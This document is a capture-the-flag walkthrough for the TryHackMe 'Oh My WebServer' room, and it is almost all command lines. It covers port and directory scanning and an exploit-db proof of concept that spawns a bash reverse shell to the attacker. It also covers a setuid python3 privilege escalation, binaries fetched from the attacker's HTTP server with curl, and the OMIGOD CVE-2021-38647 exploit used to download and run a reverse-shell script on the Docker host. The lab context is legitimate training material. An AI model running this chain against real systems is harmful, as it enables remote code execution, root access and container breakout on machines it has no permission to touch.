Oh My WebServer
Room Link: https://tryhackme.com/room/ohmyweb
Initial Scan
Kali
nmap -A $VICTIM
Scan all ports
Kali
nmap -sV -sT -O -p 1-65535 $VICTIM
TCP/80 - HTTP
Kali
gobuster dir -u $VICTIM -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt
Initial Shell
Exploit: https://www.exploit-db.com/raw/50383
Kali
nc -lvnp 1337Kali
wget https://www.exploit-db.com/raw/50383 -O poc.sh
chmod +x poc.sh
./poc.sh targets.txt /bin/bash "bash -c 'bash -i >& /dev/tcp/$KALI/1337 0>&1'"
Get autocomplete
python3 -c 'import pty; pty.spawn("/bin/bash")'
ctrl + Z
stty raw -echo;fg
Privileges Escalation
Exploit: https://gtfobins.github.io/gtfobins/python/
Victim
getcap -r / 2>/dev/null
/usr/bin/python3.7 -c 'import os; os.setuid(0); os.system("/bin/sh")'
Nmap
Scanned the gateway
Kali
wget https://github.com/andrew-d/static-binaries/blob/master/binaries/linux/x86_64/nmap
python2 -m SimpleHTTPServer 81Victim
cd /tmp/
curl http://10.10.30.128:81/nmap -O nmap
chmod +x nmap
./nmap -p- 172.17.0.1 --min-rate=700 -vvv
Privileges Escalation / Breakout of Docker
shell.sh
#!/bin/bash
sh -i >& /dev/tcp/$KALI/1338 0>&1Kali
git clone https://github.com/horizon3ai/CVE-2021-38647.git
cd CVE-2021-38647/
python2 -m SimpleHTTPServer 81Victim
cd /tmp/
curl http://10.10.30.128:81/omigod.py -O omigod.pyKali
nc -lvnp 1338Victim
python3 omigod.py -t 172.17.0.1 -c "curl http://$KALI:81/shell.sh -O shell.sh"
python3 omigod.py -t 172.17.0.1 -c "chmod +x shell.sh"
python3 omigod.py -t 172.17.0.1 -c "./shell.sh"
Last updated